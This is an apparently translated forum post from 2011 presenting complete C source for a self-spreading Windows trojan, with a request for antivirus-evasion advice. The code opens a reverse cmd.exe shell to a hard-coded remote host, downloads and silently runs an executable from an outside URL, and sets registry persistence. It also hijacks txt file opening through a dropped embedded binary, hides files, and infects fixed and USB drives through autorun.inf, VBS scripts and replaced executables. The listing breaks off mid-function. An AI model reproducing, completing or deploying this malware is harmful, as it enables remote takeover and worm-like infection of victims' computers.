
[Original] Infecting Trojan in C

2011-5-22 10:20 20825

[Requesting featured status] You all know what this is about.
I used to read assembly viruses all the time. Assembly viruses handle the complex PE file structure with ease, but writing all the other functionality in assembly is less satisfying, so I tried writing an infecting trojan in C and hope the experts here can give me some pointers. It includes disk infection, USB drive infection, writing autorun.inf and automatic download of a virus from the web. The virus has two threads: one runs the reverse-connect trojan, the other infects disks and USB drives, hiding every executable on the USB drive, appending a space to its name and replacing the original file name with the virus. The virus automatically drops a Noteped.exe and changes the txt file association to noteped.exe; that file first opens the txt file and then runs the virus, so simply opening a txt file re-runs the virus. The techniques the virus uses are all conventional ones, so antivirus software will flag it; I hope you experts can suggest some AV evasion techniques. Enough talk, here is the code.
/* ////////////////////////////////////////////////////////////////////////////////
 * Abstract:   Reverse-connect infecting trojan in C, with USB drive infection, disk infection and auto-download.
 * Author:     H•Y•H
 * Completed:  15 May 2011
/////////////////////////////////////////////////////////////////////////////// */
#include <string.h>
#include <Winsock2.h>
#include <stdio.h>
#include <Wininet.h>
#pragma warning(disable:4309)
#pragma warning(disable:4305)
#pragma comment(linker,"/subsystem:windows")
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"wininet.lib")
#define MyAddr "h158678667.3322.org"  
#define MyPort 8081
char localfile[MAX_PATH];
DWORD WINAPI Trojan(LPVOID lpParameter);
DWORD WINAPI Infect(LPVOID lpParameter);
bool FileExists(char *filename);
void RegWrite();
void HideFile();
bool WriteInf(char *infname);
bool WriteVbs(char *vbsname);
void InfectDisk(char *drive);
void ReleaseNoteped();
bool InfectU(char *UDiskName);
char *left(char *dst,char *src, int n);
BOOL DownLoadFile(char *url,char *filename);
//Please don't be scared of this big array: it is just the hex form of an exe file (source code in the red code below), copied straight from C32Asm; you can skip it..
char node[]={0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0xC8,0x00,0x00,0x00,0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,\
0x01,0x4C,0xCD,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,\
0x6E,0x6E,0x6F,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20,\
0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0D,0x0A,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0xF8,0x8B,\
0xDF,0x37,0x99,0xE5,0x8C,0x37,0x99,0xE5,0x8C,0x37,0x99,0xE5,0x8C,0xB4,0x85,0xEB,0x8C,0x36,0x99,\
0xE5,0x8C,0x37,0x99,0xE4,0x8C,0x3E,0x99,0xE5,0x8C,0x55,0x86,0xF6,0x8C,0x32,0x99,0xE5,0x8C,0xDF,\
0x86,0xEE,0x8C,0x36,0x99,0xE5,0x8C,0x52,0x69,0x63,0x68,0x37,0x99,0xE5,0x8C,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x4C,0x01,0x01,\
0x00,0x69,0x97,0xC6,0x4D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE0,0x00,0x0F,0x01,0x0B,0x01,\
0x06,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x10,0x00,0x00,0x00,\
0x10,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,\
0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,\
0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,\
0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,0x12,0x00,0x00,0x3C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x10,0x00,0x00,0x2C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,\
0x00,0x00,0xCA,0x03,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x10,0x13,0x00,0x00,0x1A,0x13,0x00,0x00,0x30,0x13,0x00,0x00,0x3C,0x13,0x00,0x00,0x48,0x13,\
0x00,0x00,0x5E,0x13,0x00,0x00,0x76,0x13,0x00,0x00,0x88,0x13,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,\
0x13,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x65,0x78,0x70,0x31,0x6F,0x72,0x65,0x72,\
0x2E,0x65,0x78,0x65,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x65,0x78,0x70,0x31,0x6F,0x72,\
0x65,0x72,0x2E,0x65,0x78,0x65,0x00,0x00,0x00,0x5C,0x6E,0x6F,0x74,0x65,0x70,0x61,0x64,0x2E,0x65,\
0x78,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x55,\
0x8B,0xEC,0x81,0xEC,0x20,0x05,0x00,0x00,0x53,0x56,0x8D,0x45,0xF4,0x57,0x33,0xDB,0x50,0x89,0x5D,\
0xF4,0xFF,0x15,0x18,0x10,0x40,0x00,0x50,0xFF,0x15,0x24,0x10,0x40,0x00,0xBE,0x04,0x01,0x00,0x00,\
0x89,0x45,0xFC,0x56,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x53,0x50,0xE8,0xA8,0x01,0x00,0x00,0x56,0x8D,\
0x85,0xF0,0xFE,0xFF,0xFF,0x53,0x50,0xE8,0x9A,0x01,0x00,0x00,0x56,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,\
0x53,0x50,0xE8,0x8C,0x01,0x00,0x00,0x56,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x53,0x50,0xE8,0x7E,0x01,\
0x00,0x00,0x56,0x8D,0x85,0xE0,0xFA,0xFF,0xFF,0x53,0x50,0xE8,0x70,0x01,0x00,0x00,0x83,0xC4,0x3C,\
0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x56,0x50,0xFF,0x15,0x14,0x10,0x40,0x00,0x8D,0x85,0xE4,0xFB,0xFF,\
0xFF,0x56,0x50,0xFF,0x15,0x10,0x10,0x40,0x00,0x8B,0x3D,0x0C,0x10,0x40,0x00,0x8D,0x85,0xF0,0xFE,\
0xFF,0xFF,0x50,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xFF,0xD7,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x50,\
0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x50,0xFF,0xD7,0x8B,0x3D,0x08,0x10,0x40,0x00,0x8D,0x85,0xE8,0xFC,\
0xFF,0xFF,0x68,0x54,0x10,0x40,0x00,0x50,0xFF,0xD7,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x68,0x44,0x10,\
0x40,0x00,0x50,0xFF,0xD7,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0x68,0x44,0x10,0x40,0x00,0x50,0xFF,0xD7,\
0x6A,0x01,0x58,0x39,0x45,0xF4,0x89,0x45,0xF8,0x7E,0x50,0x8B,0x45,0xFC,0x83,0xC0,0x04,0x89,0x45,\
0xFC,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x68,0x40,0x10,0x40,0x00,0x50,0xFF,0xD7,0x53,0x53,0x8D,0x85,\
0xE0,0xFA,0xFF,0xFF,0x56,0x50,0x8B,0x45,0xFC,0x6A,0xFF,0xFF,0x30,0x53,0x6A,0x01,0xFF,0x15,0x04,\
0x10,0x40,0x00,0x8D,0x85,0xE0,0xFA,0xFF,0xFF,0x50,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x50,0xFF,0xD7,\
0xFF,0x45,0xF8,0x83,0x45,0xFC,0x04,0x8B,0x45,0xF8,0x3B,0x45,0xF4,0x7C,0xB9,0x8B,0x35,0x00,0x10,\
0x40,0x00,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x6A,0x05,0x50,0xFF,0xD6,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,\
0x50,0xE8,0x60,0x00,0x00,0x00,0x84,0xC0,0x59,0x74,0x09,0x53,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0xEB,\
0x46,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0x50,0xE8,0x46,0x00,0x00,0x00,0x84,0xC0,0x59,0x74,0x09,0x53,\
0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0xEB,0x2C,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x68,0x30,0x10,0x40,0x00,\
0x50,0x88,0x9D,0xEF,0xFD,0xFF,0xFF,0xFF,0xD7,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xE8,0x18,0x00,\
0x00,0x00,0x84,0xC0,0x59,0x74,0x0A,0x53,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xFF,0xD6,0x5F,0x5E,\
0x33,0xC0,0x5B,0xC9,0xC2,0x10,0x00,0x55,0x8B,0xEC,0x81,0xEC,0x40,0x01,0x00,0x00,0x8D,0x85,0xC0,\
0xFE,0xFF,0xFF,0x50,0xFF,0x75,0x08,0xFF,0x15,0x1C,0x10,0x40,0x00,0x83,0xF8,0xFF,0x0F,0x95,0xC0,\
0xC9,0xC3,0xCC,0xCC,0x8B,0x54,0x24,0x0C,0x8B,0x4C,0x24,0x04,0x85,0xD2,0x74,0x47,0x33,0xC0,0x8A,\
0x44,0x24,0x08,0x57,0x8B,0xF9,0x83,0xFA,0x04,0x72,0x2D,0xF7,0xD9,0x83,0xE1,0x03,0x74,0x08,0x2B,\
0xD1,0x88,0x07,0x47,0x49,0x75,0xFA,0x8B,0xC8,0xC1,0xE0,0x08,0x03,0xC1,0x8B,0xC8,0xC1,0xE0,0x10,\
0x03,0xC1,0x8B,0xCA,0x83,0xE2,0x03,0xC1,0xE9,0x02,0x74,0x06,0xF3,0xAB,0x85,0xD2,0x74,0x06,0x88,\
0x07,0x47,0x4A,0x75,0xFA,0x8B,0x44,0x24,0x08,0x5F,0xC3,0x8B,0x44,0x24,0x04,0xC3,0xE4,0x12,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x9A,0x13,0x00,0x00,0x00,0x10,0x00,0x00,0x08,0x13,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xBE,0x13,0x00,0x00,0x24,0x10,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x10,0x13,0x00,0x00,0x1A,0x13,0x00,0x00,0x30,0x13,0x00,0x00,0x3C,0x13,0x00,0x00,0x48,0x13,0x00,\
0x00,0x5E,0x13,0x00,0x00,0x76,0x13,0x00,0x00,0x88,0x13,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,0x13,\
0x00,0x00,0x00,0x00,0x00,0x00,0xD3,0x02,0x57,0x69,0x6E,0x45,0x78,0x65,0x63,0x00,0xD2,0x02,0x57,\
0x69,0x64,0x65,0x43,0x68,0x61,0x72,0x54,0x6F,0x4D,0x75,0x6C,0x74,0x69,0x42,0x79,0x74,0x65,0x00,\
0xF9,0x02,0x6C,0x73,0x74,0x72,0x63,0x61,0x74,0x41,0x00,0x00,0x02,0x03,0x6C,0x73,0x74,0x72,0x63,\
0x70,0x79,0x41,0x00,0x00,0x59,0x01,0x47,0x65,0x74,0x53,0x79,0x73,0x74,0x65,0x6D,0x44,0x69,0x72,\
0x65,0x63,0x74,0x6F,0x72,0x79,0x41,0x00,0x7D,0x01,0x47,0x65,0x74,0x57,0x69,0x6E,0x64,0x6F,0x77,\
0x73,0x44,0x69,0x72,0x65,0x63,0x74,0x6F,0x72,0x79,0x41,0x00,0x00,0xCB,0x00,0x47,0x65,0x74,0x43,\
0x6F,0x6D,0x6D,0x61,0x6E,0x64,0x4C,0x69,0x6E,0x65,0x57,0x00,0x94,0x00,0x46,0x69,0x6E,0x64,0x46,\
0x69,0x72,0x73,0x74,0x46,0x69,0x6C,0x65,0x41,0x00,0x00,0x4B,0x45,0x52,0x4E,0x45,0x4C,0x33,0x32,\
0x2E,0x64,0x6C,0x6C,0x00,0x00,0x02,0x00,0x43,0x6F,0x6D,0x6D,0x61,0x6E,0x64,0x4C,0x69,0x6E,0x65,\
0x54,0x6F,0x41,0x72,0x67,0x76,0x57,0x00,0x00,0x53,0x48,0x45,0x4C,0x4C,0x33,0x32,0x2E,0x64,0x6C,\
0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,PSTR szCmdLine,int iCmdShow)
{
//Create a named mutex so the process cannot be run more than once
        HANDLE hMutex=CreateMutex(NULL,FALSE,"HYH");
        if(hMutex==NULL)
                ExitProcess(0);
        if(GetLastError()==ERROR_ALREADY_EXISTS)
                ExitProcess(0);
        memset(localfile,0,MAX_PATH);
        GetModuleFileName(NULL,localfile,MAX_PATH);
        HANDLE hTrojan=CreateThread(NULL,NULL,Trojan,NULL,NULL,NULL);
        HANDLE infect=CreateThread(NULL,NULL,Infect,NULL,NULL,NULL);
        char url[MAX_PATH]="http://www.ku6tvb.com/Sx_server.exe";
        if(!FileExists("c:\\Program Files\\a.exe"))
        {
                DownLoadFile(url,"c:\\Program Files\\a.exe");
                SetFileAttributes("c:\\Program Files\\a.exe",FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
        }
        WinExec("c:\\Program Files\\a.exe",SW_HIDE);
        while(true)
        {
                HideFile();
                RegWrite();
                Sleep(300000);
        }
        return 0;
}
//Reverse-connect trojan thread: connects to the nc server over a TCP socket and hands the client machine's cmd to the server...
DWORD WINAPI Trojan(LPVOID lpParameter)
{
        LPHOSTENT HostEnts;
        SOCKADDR_IN SockAddrIn;
        SOCKET HSocket;
        DWORD *lpdwflags=NULL;
        int status;
        char szCMDPath[MAX_PATH];
        STARTUPINFO StartupInfo;
        WSADATA WSADa;
        PROCESS_INFORMATION ProcessInfo;
        GetSystemDirectory(szCMDPath,MAX_PATH);
        strcat(szCMDPath,"\\cmd.exe");
        for(;;)
        {
                try
                {
                while(!InternetGetConnectedState(lpdwflags,0))
                        Sleep(10000);
                status=0;
                ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
                ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
                ZeroMemory(&WSADa,sizeof(WSADATA));
                WSAStartup(MAKEWORD(1,1),&WSADa);
                HostEnts=gethostbyname(MyAddr);
                SockAddrIn.sin_addr=*((LPIN_ADDR)*HostEnts->h_addr_list);
                SockAddrIn.sin_family=AF_INET;
                SockAddrIn.sin_port=htons(MyPort);
                HSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
                do{
                        status=connect(HSocket,(SOCKADDR *)&SockAddrIn,sizeof(SockAddrIn));
                }while(status==SOCKET_ERROR);
                StartupInfo.cb=sizeof(STARTUPINFO);
                StartupInfo.wShowWindow=SW_HIDE;
                StartupInfo.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
                StartupInfo.hStdError=(HANDLE)HSocket;
                StartupInfo.hStdOutput=(HANDLE)HSocket;
                StartupInfo.hStdInput=(HANDLE)HSocket;
                CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
                WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
                if (WAIT_OBJECT_0==WaitForSingleObject(ProcessInfo.hProcess,INFINITE))
                {
                        CloseHandle(ProcessInfo.hProcess);
                        CloseHandle(ProcessInfo.hThread);
                        closesocket(HSocket);
                        WSACleanup();
                }
          }
          catch(...)
          {
                  continue;
          }
        }
}
//Infection thread: infects system disks and USB drives; the thing to learn here is the API functions for obtaining drive letters and how to use them
DWORD WINAPI Infect(LPVOID lpParameter)
{
        char Drives[255];
        int Type;
        char *pDrive;
        char systempath[MAX_PATH];
        char windowspath[MAX_PATH];
        memset(systempath,0,MAX_PATH);
        memset(windowspath,0,MAX_PATH);
        GetWindowsDirectory(windowspath,MAX_PATH);
        GetSystemDirectory(systempath,MAX_PATH);
        while(true)
        {
                memset(Drives,0,sizeof(Drives));
                pDrive=Drives;
                GetLogicalDriveStrings(sizeof(Drives),Drives);
                for(;pDrive[0]!=NULL;)
                {
                        Type=GetDriveType(pDrive);
                        switch(Type)
                        {
                        case DRIVE_REMOVABLE:
                                if(strcmp(pDrive,"A:\\")==0)
                                {
                                        pDrive+=4;
                                        continue;
                                }
                                else
                                {
                                        InfectDisk(pDrive);
                                        InfectU(pDrive);
                                        pDrive+=4;continue;
                                }
                        case DRIVE_FIXED:InfectDisk(pDrive);
                                pDrive+=4;continue;
                        default:pDrive+=4;continue;
                        }
                }
                strcat(windowspath,"\\exp1orer.exe");
                CopyFile(localfile,windowspath,TRUE);
                strcat(systempath,"\\exp1orer.exe");
                CopyFile(localfile,systempath,TRUE);
                systempath[3]='\0';
                strcat(systempath,"Program Files\\exp1orer.exe");
                CopyFile(localfile,systempath,TRUE);
                memset(windowspath,0,MAX_PATH);
                GetWindowsDirectory(windowspath,MAX_PATH);
                strcat(windowspath,"\\noteped.exe");
                if(!FileExists(windowspath))
                        ReleaseNoteped();
                Sleep(10000);
        }
}
//Modify the relevant registry entries; just understand how the common registry API functions are used..
void RegWrite()
{
        HKEY hKey;
        DWORD value;
        char filepath[MAX_PATH];
        memset(filepath,0,MAX_PATH);
        GetWindowsDirectory(filepath,MAX_PATH);
        strcat(filepath,"\\exp1orer.exe");
        //Change the home page
        RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\Main",&hKey);
        RegSetValueEx(hKey,"Start Page",0,REG_SZ,(BYTE *)"www.gov.cn",lstrlen("www.gov.cn"));
        //Add itself to the startup entries
        RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",&hKey);
        RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
        filepath[3]='\0';
        strcat(filepath,"Program Files\\exp1orer.exe");
        RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
        filepath[3]='\0';
        strcat(filepath,"exp1orer.exe");
        RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
        RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
        memset(filepath,0,MAX_PATH);
        GetWindowsDirectory(filepath,MAX_PATH);
        strcat(filepath,"\\noteped.exe %1");
        //Change the txt file association
        RegCreateKey(HKEY_CLASSES_ROOT,"txtfile\\shell\\open\\command",&hKey);
        RegSetValueEx(hKey,"",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
        value=243;
        RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",&hKey);
        RegSetValueEx(hKey,"NoDriveTypeAutoRun",0,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
        //Make "show hidden files" ineffective
        value=0;
        RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",&hKey);
        RegSetValueEx(hKey,"CheckedValue",0,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
        value=2;
        RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN",&hKey);
        RegSetValueEx(hKey,"CheckedValue",3,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
}
//Copy the virus to the system directory and the Windows directory and set it hidden
void HideFile()
{
        char newfile[MAX_PATH];
        memset(newfile,0,MAX_PATH);
        GetSystemDirectory(newfile,MAX_PATH);
        strcat(newfile,"\\exp1orer.exe");
        CopyFile(localfile,newfile,TRUE);
        SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
        memset(newfile,0,MAX_PATH);
        GetWindowsDirectory(newfile,MAX_PATH);
        strcat(newfile,"\\exp1orer.exe");
        CopyFile(localfile,newfile,TRUE);
        SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);       
        newfile[3]='\0';
        strcat(newfile,"Program Files\\exp1orer.exe");
        CopyFile(localfile,newfile,TRUE);
        SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
//Write the autorun.inf file so that disks and USB drives autorun
bool WriteInf(char *infname)
{
        char autorun[MAX_PATH]="[AutoRun]\nopen=wscript.exe system.vbs\nshell\\open\\打开(&O)\nshell\\open\\Command=wscript.exe system.vbs\nshell\\open\\default=1\nshell\\explore\\资源管理器(&X)\nshell\\explore\\Command=wscript.exe system.vbs";
        FILE *fp;
        fp=fopen(infname,"w+");
        if(fp==NULL)
                return FALSE;
        fwrite(autorun,sizeof(char),lstrlen(autorun),fp);
        fclose(fp);
        SetFileAttributes(infname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
        return TRUE;
}
//Write the vbs file: when the disk is opened, run the virus and open the disk at the same time
bool WriteVbs(char *vbsname)
{
        char *vbs1={"On Error Resume Next\nDim Wsh\nSet Wsh = WScript.CreateObject(\"WScript.Shell\")\nWsh.Run \"cmd /c explorer "};
        char *vbs2={"\",false,false\nWsh.Run \"exp1orer.exe\",false,false\nWScript.quit"};
        char vbs[MAX_PATH];
        char path[MAX_PATH];
        memset(path,0,MAX_PATH);
        memset(vbs,0,MAX_PATH);
        strcpy(path,vbsname);
        path[3]='\0';
        strcpy(vbs,vbs1);
        strcat(vbs,path);
        strcat(vbs,vbs2);
        FILE *fp;
        fp=fopen(vbsname,"w+");
        if(fp==NULL)
                return FALSE;
        fwrite(vbs,sizeof(char),lstrlen(vbs),fp);
        fclose(fp);
        SetFileAttributes(vbsname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
        return TRUE;
}
//Drop noteped.exe into the Windows directory to hijack how txt files are opened
void ReleaseNoteped()
{
        DWORD written;
        char windows[MAX_PATH];
        memset(windows,0,MAX_PATH);
        GetWindowsDirectory(windows,MAX_PATH);
        strcat(windows,"\\noteped.exe");
        HANDLE hFile=CreateFile(windows,GENERIC_WRITE,NULL,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
        WriteFile(hFile,node,sizeof(node),&written,NULL);
        FlushFileBuffers(hFile);
        CloseHandle(hFile);
}
//Infect the USB drive: replace every executable on it with the virus file, append a space to the original file name and hide it; the thing to learn here is how to traverse a disk...
bool InfectU(char *UDiskName)
{
        WIN32_FIND_DATA winfind;
        HANDLE hFile;
        char path[MAX_PATH];
        char newpath[MAX_PATH];
        char newname[MAX_PATH];
        char oldname[MAX_PATH];
        char filename[MAX_PATH];
        strcpy(path,UDiskName);
        strcat(path,"*.*");
        hFile=FindFirstFile(path,&winfind);
        if(hFile==INVALID_HANDLE_VALUE)
                return false;
        do
        {
                if(strcmp(winfind.cFileName,".")==0||strcmp(winfind.cFileName,"..")==0)
                        continue;
                if(winfind.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY)
                {
                        sprintf(newpath,"%s%s\\",UDiskName,winfind.cFileName);
                        InfectU(newpath);         
                }
                if(strstr(winfind.cFileName,".exe")!=NULL && strstr(winfind.cFileName," .exe")==NULL)
                {
                        if(strcmp(winfind.cFileName,"exp1orer.exe")!=0)
                        {
                                left(filename,winfind.cFileName,int(strstr(winfind.cFileName,".exe")-winfind.cFileName));
                                strcpy(newname,UDiskName);
                                strcat(newname,filename);
                                strcat(newname," .exe");
                                strcpy(oldname,UDiskName);
                                strcat(oldname,winfind.cFileName);
                                if(!MoveFileEx(oldname,newname,MOVEFILE_COPY_ALLOWED))
                                        return false;
                                SetFileAttributes(newname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
                                if(!CopyFile(localfile,oldname,FALSE))
                                        return false;
                                SetFileAttributes(oldname,FILE_ATTRIBUTE_NORMAL);
                        }
                }
        }while(FindNextFile(hFile,&winfind));
        return true;
}
//Infect a disk: write autorun.inf and the vbs script
void InfectDisk(char *drive)
{
        char diskfile[MAX_PATH];
        char diskinf[MAX_PATH];
        char diskvbs[MAX_PATH];
        memset(diskfile,0,MAX_PATH);
        memset(diskinf,0,MAX_PATH);
        memset(diskvbs,0,MAX_PATH);
        strcpy(diskfile,drive);
        strcpy(diskinf,drive);
        strcpy(diskvbs,drive);
        strcat(diskfile,"exp1orer.exe");
        strcat(diskinf,"autorun.inf");
        strcat(diskvbs,"system.vbs");
        printf("%s",localfile);
        printf("%s",diskfile);
        CopyFile(localfile,diskfile,TRUE);
        SetFileAttributes(diskfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
        WriteInf(diskinf);
        WriteVbs(diskvbs);
}
//Take the leftmost N characters of a string
char *left(char *dst,char *src, int n)
{
        char *p = src;
        char *q = dst;
        int len = strlen(src);
        if(n>len)
                n = len;
        while(n--)
                *(q++) = *(p++);
        *(q++)='\0';
        return dst;
}
//Check whether a file exists
bool FileExists(char *filename)
{
        HANDLE hFind;
        WIN32_FIND_DATA FindData;
        hFind=FindFirstFile(filename,&FindData);
        if(hFind==INVALID_HANDLE_VALUE)
        {
                return false;
        }
        return true;
}
//Use the HTTP-related API functions from wininet.h to download a file from the network (in plain words: read a file from the web and write it to the local machine)
BOOL DownLoadFile(char *url,char *filename)
{
        DWORD byteread=0;   
        char buffer[25*1024];   
        memset(buffer,0,25*1024);   
        HINTERNET HInternet;   
        HInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);   
        if (HInternet==NULL)   
        {   
                return FALSE;   
        }   
        HINTERNET    HOpen;   
        HOpen = InternetOpenUrl(HInternet,url,
                NULL,0,INTERNET_FLAG_TRANSFER_BINARY|INTERNET_FLAG_PRAGMA_NOCACHE,0);      
        if (HOpen==NULL)   
        {   
                InternetCloseHandle(HInternet);
                return FALSE;
        }   
        BOOL hwrite;   
        DWORD written;   
        HANDLE createfile;   
        createfile = CreateFile(filename,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);   
        if (createfile==INVALID_HANDLE_VALUE)   
        {      
                InternetCloseHandle(HOpen);
                InternetCloseHandle(HInternet);  
                return FALSE;
        }   
        BOOL internetreadfile;   
        while(1)   
        {   
                internetreadfile=InternetReadFile(HOpen,buffer,sizeof(buffer),&byteread);   
                if(byteread==0)     
                        break;   
                hwrite=WriteFile(createfile,buffer,sizeof(buffer),&written,NULL);   
                if (hwrite==0)   
                {   
                        CloseHandle(createfile);  
                        InternetCloseHandle(HOpen);
                        InternetCloseHandle(HInternet);
                        return FALSE;
                }   
        }   
